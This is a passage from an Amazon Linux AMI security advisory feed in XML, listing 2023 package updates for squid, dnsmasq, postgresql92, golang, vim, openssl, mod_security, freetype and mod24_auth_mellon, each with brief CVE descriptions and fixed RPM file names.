</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3859" title="" id="CVE-2019-3859" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3860" title="" id="CVE-2019-3860" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libssh2" version="1.4.2" release="3.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libssh2-1.4.2-3.13.amzn1.x86_64.rpm</filename></package><package name="libssh2-debuginfo" version="1.4.2" release="3.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libssh2-debuginfo-1.4.2-3.13.amzn1.x86_64.rpm</filename></package><package name="libssh2-docs" version="1.4.2" release="3.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libssh2-docs-1.4.2-3.13.amzn1.x86_64.rpm</filename></package><package name="libssh2-devel" version="1.4.2" release="3.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libssh2-devel-1.4.2-3.13.amzn1.x86_64.rpm</filename></package><package name="libssh2-debuginfo" version="1.4.2" release="3.13.amzn1" epoch="0" arch="i686"><filename>Packages/libssh2-debuginfo-1.4.2-3.13.amzn1.i686.rpm</filename></package><package name="libssh2-devel" version="1.4.2" release="3.13.amzn1" epoch="0" arch="i686"><filename>Packages/libssh2-devel-1.4.2-3.13.amzn1.i686.rpm</filename></package><package name="libssh2" version="1.4.2" release="3.13.amzn1" epoch="0" arch="i686"><filename>Packages/libssh2-1.4.2-3.13.amzn1.i686.rpm</filename></package><package name="libssh2-docs" version="1.4.2" release="3.13.amzn1" epoch="0" arch="i686"><filename>Packages/libssh2-docs-1.4.2-3.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1757</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1757: important priority package update for squid</title><issued 
date="2023-05-25 17:41:00" /><updated date="2023-06-06 18:36:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-18676:
An issue was discovered in Squid 3.x and 4.x through 4.8. Due to incorrect input validation, there is a heap-based buffer overflow that can result in Denial of Service to all clients using the proxy. Severity is high due to this vulnerability occurring before normal security checks; any remote client that can reach the proxy port can trivially perform the attack via a crafted URI scheme.
CVE-2019-12523:
An issue was discovered in Squid before 4.9. When handling a URN request, a corresponding HTTP request is made. This HTTP request doesn't go through the access checks that incoming HTTP requests go through. This causes all access checks to be bypassed and allows access to restricted HTTP servers, e.g., an attacker can connect to HTTP servers that only listen on localhost.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12523" title="" id="CVE-2019-12523" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18676" title="" id="CVE-2019-18676" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid-migration-script" version="3.5.20" release="17.46.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-migration-script-3.5.20-17.46.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="17.46.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.5.20-17.46.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.46.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.5.20-17.46.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.46.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.5.20-17.46.amzn1.i686.rpm</filename></package><package name="squid" version="3.5.20" release="17.46.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.5.20-17.46.amzn1.i686.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.46.amzn1" epoch="7" arch="i686"><filename>Packages/squid-migration-script-3.5.20-17.46.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1758</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1758: medium priority package update for dnsmasq</title><issued date="2023-06-05 16:39:00" /><updated date="2023-06-08 23:39:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-28450:
An issue was discovered in Dnsmasq before 2.90. The default maximum EDNS.0 UDP packet size was set to 4096 but should be 1232 because of DNS Flag Day 2020.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28450" title="" id="CVE-2023-28450" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="dnsmasq" version="2.76" release="16.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/dnsmasq-2.76-16.17.amzn1.x86_64.rpm</filename></package><package name="dnsmasq-debuginfo" version="2.76" release="16.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/dnsmasq-debuginfo-2.76-16.17.amzn1.x86_64.rpm</filename></package><package name="dnsmasq-utils" version="2.76" release="16.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/dnsmasq-utils-2.76-16.17.amzn1.x86_64.rpm</filename></package><package name="dnsmasq" version="2.76" release="16.17.amzn1" epoch="0" arch="i686"><filename>Packages/dnsmasq-2.76-16.17.amzn1.i686.rpm</filename></package><package name="dnsmasq-debuginfo" version="2.76" release="16.17.amzn1" epoch="0" arch="i686"><filename>Packages/dnsmasq-debuginfo-2.76-16.17.amzn1.i686.rpm</filename></package><package name="dnsmasq-utils" version="2.76" release="16.17.amzn1" epoch="0" arch="i686"><filename>Packages/dnsmasq-utils-2.76-16.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1759</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1759: important priority package update for postgresql92</title><issued date="2023-06-05 16:39:00" /><updated date="2023-06-08 23:39:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-2454:
This enabled an attacker having database-level CREATE privilege to execute arbitrary code as the bootstrap superuser. Database owners have that right by default, and explicit grants may extend it to other users.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2454" title="" id="CVE-2023-2454" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql92-docs" version="9.2.24" release="3.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-docs-9.2.24-3.69.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.24" release="3.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython27-9.2.24-3.69.amzn1.x86_64.rpm</filename></package><package name="postgresql92-test" version="9.2.24" release="3.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-test-9.2.24-3.69.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plperl" version="9.2.24" release="3.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plperl-9.2.24-3.69.amzn1.x86_64.rpm</filename></package><package name="postgresql92-contrib" version="9.2.24" release="3.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-contrib-9.2.24-3.69.amzn1.x86_64.rpm</filename></package><package name="postgresql92" version="9.2.24" release="3.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-9.2.24-3.69.amzn1.x86_64.rpm</filename></package><package name="postgresql92-libs" version="9.2.24" release="3.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-libs-9.2.24-3.69.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server" version="9.2.24" release="3.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-9.2.24-3.69.amzn1.x86_64.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.24" release="3.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-debuginfo-9.2.24-3.69.amzn1.x86_64.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.24" release="3.69.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/postgresql92-pltcl-9.2.24-3.69.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.24" release="3.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython26-9.2.24-3.69.amzn1.x86_64.rpm</filename></package><package name="postgresql92-devel" version="9.2.24" release="3.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-devel-9.2.24-3.69.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.24" release="3.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-compat-9.2.24-3.69.amzn1.x86_64.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.24" release="3.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-debuginfo-9.2.24-3.69.amzn1.i686.rpm</filename></package><package name="postgresql92-devel" version="9.2.24" release="3.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-devel-9.2.24-3.69.amzn1.i686.rpm</filename></package><package name="postgresql92-libs" version="9.2.24" release="3.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-libs-9.2.24-3.69.amzn1.i686.rpm</filename></package><package name="postgresql92-docs" version="9.2.24" release="3.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-docs-9.2.24-3.69.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.24" release="3.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython26-9.2.24-3.69.amzn1.i686.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.24" release="3.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-pltcl-9.2.24-3.69.amzn1.i686.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.24" release="3.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-compat-9.2.24-3.69.amzn1.i686.rpm</filename></package><package 
name="postgresql92-plperl" version="9.2.24" release="3.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plperl-9.2.24-3.69.amzn1.i686.rpm</filename></package><package name="postgresql92-contrib" version="9.2.24" release="3.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-contrib-9.2.24-3.69.amzn1.i686.rpm</filename></package><package name="postgresql92-server" version="9.2.24" release="3.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-9.2.24-3.69.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.24" release="3.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython27-9.2.24-3.69.amzn1.i686.rpm</filename></package><package name="postgresql92-test" version="9.2.24" release="3.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-test-9.2.24-3.69.amzn1.i686.rpm</filename></package><package name="postgresql92" version="9.2.24" release="3.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-9.2.24-3.69.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1760</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1760: important priority package update for golang</title><issued date="2023-06-05 16:39:00" /><updated date="2023-06-08 23:39:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-29400:
html/template: improper handling of empty HTML attributes.
Templates containing actions in unquoted HTML attributes (e.g. "attr={{.}}") executed with empty input could result in output that would have unexpected results when parsed due to HTML normalization rules. This may allow injection of arbitrary attributes into tags.
CVE-2023-24540:
html/template: improper handling of JavaScript whitespace.
Not all valid JavaScript whitespace characters were considered to be whitespace. Templates containing whitespace characters outside of the character set "\t\n\f\r\u0020\u2028\u2029" in JavaScript contexts that also contain actions may not be properly sanitized during execution.
CVE-2023-24539:
html/template: improper sanitization of CSS values
Angle brackets (<>) were not considered dangerous characters when inserted into CSS contexts. Templates containing multiple actions separated by a '/' character could result in unexpectedly closing the CSS context and allowing for injection of unexpected HTML, if executed with untrusted input.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24539" title="" id="CVE-2023-24539" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24540" title="" id="CVE-2023-24540" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29400" title="" id="CVE-2023-29400" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-bin" version="1.18.6" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.18.6-1.44.amzn1.x86_64.rpm</filename></package><package name="golang-shared" version="1.18.6" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-shared-1.18.6-1.44.amzn1.x86_64.rpm</filename></package><package name="golang-race" version="1.18.6" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.18.6-1.44.amzn1.x86_64.rpm</filename></package><package name="golang" version="1.18.6" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.18.6-1.44.amzn1.x86_64.rpm</filename></package><package name="golang-misc" version="1.18.6" release="1.44.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.18.6-1.44.amzn1.noarch.rpm</filename></package><package name="golang-docs" version="1.18.6" release="1.44.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.18.6-1.44.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.18.6" release="1.44.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.18.6-1.44.amzn1.noarch.rpm</filename></package><package name="golang-tests" version="1.18.6" release="1.44.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.18.6-1.44.amzn1.noarch.rpm</filename></package><package name="golang-shared" version="1.18.6" release="1.44.amzn1" epoch="0" 
arch="i686"><filename>Packages/golang-shared-1.18.6-1.44.amzn1.i686.rpm</filename></package><package name="golang-bin" version="1.18.6" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.18.6-1.44.amzn1.i686.rpm</filename></package><package name="golang" version="1.18.6" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.18.6-1.44.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1761</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1761: important priority package update for vim</title><issued date="2023-06-05 16:39:00" /><updated date="2023-06-08 23:39:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-2610:
Integer Overflow or Wraparound in GitHub repository vim/vim prior to 9.0.1532.
CVE-2023-2609:
NULL Pointer Dereference in GitHub repository vim/vim prior to 9.0.1531.
CVE-2023-2426:
Use of Out-of-range Pointer Offset in GitHub repository vim/vim prior to 9.0.1499.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2426" title="" id="CVE-2023-2426" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2609" title="" id="CVE-2023-2609" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2610" title="" id="CVE-2023-2610" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-data" version="9.0.1587" release="1.79.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-data-9.0.1587-1.79.amzn1.noarch.rpm</filename></package><package name="vim-common" version="9.0.1587" release="1.79.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-9.0.1587-1.79.amzn1.x86_64.rpm</filename></package><package name="vim-enhanced" version="9.0.1587" release="1.79.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-9.0.1587-1.79.amzn1.x86_64.rpm</filename></package><package name="vim-minimal" version="9.0.1587" release="1.79.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-9.0.1587-1.79.amzn1.x86_64.rpm</filename></package><package name="xxd" version="9.0.1587" release="1.79.amzn1" epoch="2" arch="x86_64"><filename>Packages/xxd-9.0.1587-1.79.amzn1.x86_64.rpm</filename></package><package name="vim-debuginfo" version="9.0.1587" release="1.79.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-9.0.1587-1.79.amzn1.x86_64.rpm</filename></package><package name="vim-filesystem" version="9.0.1587" release="1.79.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-filesystem-9.0.1587-1.79.amzn1.noarch.rpm</filename></package><package name="vim-minimal" version="9.0.1587" release="1.79.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-9.0.1587-1.79.amzn1.i686.rpm</filename></package><package name="xxd" version="9.0.1587" release="1.79.amzn1" epoch="2" 
arch="i686"><filename>Packages/xxd-9.0.1587-1.79.amzn1.i686.rpm</filename></package><package name="vim-enhanced" version="9.0.1587" release="1.79.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-9.0.1587-1.79.amzn1.i686.rpm</filename></package><package name="vim-common" version="9.0.1587" release="1.79.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-9.0.1587-1.79.amzn1.i686.rpm</filename></package><package name="vim-debuginfo" version="9.0.1587" release="1.79.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-9.0.1587-1.79.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1762</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1762: medium priority package update for openssl</title><issued date="2023-06-05 16:39:00" /><updated date="2023-06-08 23:39:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-2650:
Issue summary: Processing some specially crafted ASN.1 object identifiers or
data containing them may be very slow.
Impact summary: Applications that use OBJ_obj2txt() directly, or use any of
the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message
size limit may experience notable to very long delays when processing those
messages, which may lead to a Denial of Service.
An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers -
most of which have no size limit. OBJ_obj2txt() may be used to translate
an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL
type ASN1_OBJECT) to its canonical numeric text form, which are the
sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by
periods.
When one of the sub-identifiers in the OBJECT IDENTIFIER is very large
(these are sizes that are seen as absurdly large, taking up tens or hundreds
of KiBs), the translation to a decimal number in text may take a very long
time. The time complexity is O(n^2) with 'n' being the size of the
sub-identifiers in bytes (*).
With OpenSSL 3.0, support to fetch cryptographic algorithms using names /
identifiers in string form was introduced. This includes using OBJECT
IDENTIFIERs in canonical numeric text form as identifiers for fetching
algorithms.
Such OBJECT IDENTIFIERs may be received through the ASN.1 structure
AlgorithmIdentifier, which is commonly used in multiple protocols to specify
what cryptographic algorithm should be used to sign or verify, encrypt or
decrypt, or digest passed data.
Applications that call OBJ_obj2txt() directly with untrusted data are
affected, with any version of OpenSSL. If the use is for the mere purpose
of display, the severity is considered low.
In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME,
CMS, CMP/CRMF or TS. It also impacts anything that processes X.509
certificates, including simple things like verifying its signature.
The impact on TLS is relatively low, because all versions of OpenSSL have a
100KiB limit on the peer's certificate chain. Additionally, this only
impacts clients, or servers that have explicitly enabled client
authentication.
In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects,
such as X.509 certificates. This is assumed to not happen in such a way
that it would cause a Denial of Service, so these versions are considered
not affected by this issue in such a way that it would be cause for concern,
and the severity is therefore considered low.
CVE-2023-0466:
The function X509_VERIFY_PARAM_add0_policy() is documented to implicitly enable the certificate policy check when doing certificate verification. However, the implementation of the function does not enable the check, which allows certificates with invalid or incorrect policies to pass the certificate verification. As suddenly enabling the policy check could break existing deployments, it was decided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy() function. Instead, the applications that require OpenSSL to perform certificate policy checks need to use X509_VERIFY_PARAM_set1_policies() or explicitly enable the policy check by calling X509_VERIFY_PARAM_set_flags() with the X509_V_FLAG_POLICY_CHECK flag argument. Certificate policy checks are disabled by default in OpenSSL and are not commonly used by applications.
CVE-2023-0465:
Applications that use a non-default option when verifying certificates may be vulnerable to an attack from a malicious CA to circumvent certain checks. Invalid certificate policies in leaf certificates are silently ignored by OpenSSL and other certificate policy checks are skipped for that certificate. A malicious CA could use this to deliberately assert invalid certificate policies in order to circumvent policy checking on the certificate altogether. Policy processing is disabled by default but can be enabled by passing the `-policy' argument to the command line utilities or by calling the `X509_VERIFY_PARAM_set1_policies()' function.
CVE-2023-0464:
A security vulnerability has been identified in all supported versions of OpenSSL related to the verification of X.509 certificate chains that include policy constraints. Attackers may be able to exploit this vulnerability by creating a malicious certificate chain that triggers exponential use of computational resources, leading to a denial-of-service (DoS) attack on affected systems. Policy processing is disabled by default but can be enabled by passing the `-policy' argument to the command line utilities or by calling the `X509_VERIFY_PARAM_set1_policies()' function.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464" title="" id="CVE-2023-0464" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465" title="" id="CVE-2023-0465" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466" title="" id="CVE-2023-0466" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650" title="" id="CVE-2023-2650" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl" version="1.0.2k" release="16.163.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-16.163.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.163.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-16.163.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.163.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-16.163.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.163.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-16.163.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.163.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-16.163.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.163.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-16.163.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.163.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.2k-16.163.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.163.amzn1" epoch="1" 
arch="i686"><filename>Packages/openssl-devel-1.0.2k-16.163.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.163.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.2k-16.163.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.163.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.2k-16.163.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1763</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1763: medium priority package update for mod_security</title><issued date="2023-06-05 16:39:00" /><updated date="2023-06-08 23:39:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-48279:
In ModSecurity before 2.9.6 and 3.x before 3.0.8, HTTP multipart requests were incorrectly parsed and could bypass the Web Application Firewall. NOTE: this is related to CVE-2022-39956 but can be considered independent changes to the ModSecurity (C language) codebase.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48279" title="" id="CVE-2022-48279" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod_security" version="2.8.0" release="5.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_security-2.8.0-5.28.amzn1.x86_64.rpm</filename></package><package name="mod_security-debuginfo" version="2.8.0" release="5.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_security-debuginfo-2.8.0-5.28.amzn1.x86_64.rpm</filename></package><package name="mlogc" version="2.8.0" release="5.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mlogc-2.8.0-5.28.amzn1.x86_64.rpm</filename></package><package name="mlogc" version="2.8.0" release="5.28.amzn1" epoch="0" arch="i686"><filename>Packages/mlogc-2.8.0-5.28.amzn1.i686.rpm</filename></package><package name="mod_security" version="2.8.0" release="5.28.amzn1" epoch="0" arch="i686"><filename>Packages/mod_security-2.8.0-5.28.amzn1.i686.rpm</filename></package><package name="mod_security-debuginfo" version="2.8.0" release="5.28.amzn1" epoch="0" arch="i686"><filename>Packages/mod_security-debuginfo-2.8.0-5.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1764</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1764: medium priority package update for freetype</title><issued date="2023-06-05 16:39:00" /><updated date="2023-06-08 23:39:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-27406:
A segmentation fault was found in FreeType's FT_Request_Size() function in the ftobjs.c file. This flaw allows an attacker to access a memory location in a way that could cause an application to halt or crash, leading to a denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27406" title="" id="CVE-2022-27406" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="freetype" version="2.3.11" release="19.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-2.3.11-19.16.amzn1.x86_64.rpm</filename></package><package name="freetype-devel" version="2.3.11" release="19.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-devel-2.3.11-19.16.amzn1.x86_64.rpm</filename></package><package name="freetype-debuginfo" version="2.3.11" release="19.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-debuginfo-2.3.11-19.16.amzn1.x86_64.rpm</filename></package><package name="freetype-demos" version="2.3.11" release="19.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-demos-2.3.11-19.16.amzn1.x86_64.rpm</filename></package><package name="freetype-devel" version="2.3.11" release="19.16.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-devel-2.3.11-19.16.amzn1.i686.rpm</filename></package><package name="freetype-debuginfo" version="2.3.11" release="19.16.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-debuginfo-2.3.11-19.16.amzn1.i686.rpm</filename></package><package name="freetype" version="2.3.11" release="19.16.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-2.3.11-19.16.amzn1.i686.rpm</filename></package><package name="freetype-demos" version="2.3.11" release="19.16.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-demos-2.3.11-19.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1765</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1765: medium priority package update for mod24_auth_mellon</title><issued date="2023-06-05 16:39:00" /><updated date="2023-06-08 23:39:00" 
/><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-3639:
A flaw was found in mod_auth_mellon where it does not sanitize logout URLs properly. This issue could be used by an attacker to facilitate phishing attacks by tricking users into visiting a trusted web application URL that redirects to an external and potentially malicious server. The highest threat from this liability is to confidentiality and integrity.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3639" title="" id="CVE-2021-3639" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_auth_mellon-diagnostics" version="0.14.0" release="2.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_auth_mellon-diagnostics-0.14.0-2.10.amzn1.x86_64.rpm</filename></package><package name="mod24_auth_mellon-debuginfo" version="0.14.0" release="2.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_auth_mellon-debuginfo-0.14.0-2.10.amzn1.x86_64.rpm</filename></package><package name="mod24_auth_mellon" version="0.14.0" release="2.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_auth_mellon-0.14.0-2.10.amzn1.x86_64.rpm</filename></package><package name="mod24_auth_mellon-diagnostics" version="0.14.0" release="2.10.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_auth_mellon-diagnostics-0.14.0-2.10.amzn1.i686.rpm</filename></package><package name="mod24_auth_mellon" version="0.14.0" release="2.10.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_auth_mellon-0.14.0-2.10.amzn1.i686.rpm</filename></package><package name="mod24_auth_mellon-debuginfo" version="0.14.0" release="2.10.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_auth_mellon-debuginfo-0.14.0-2.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 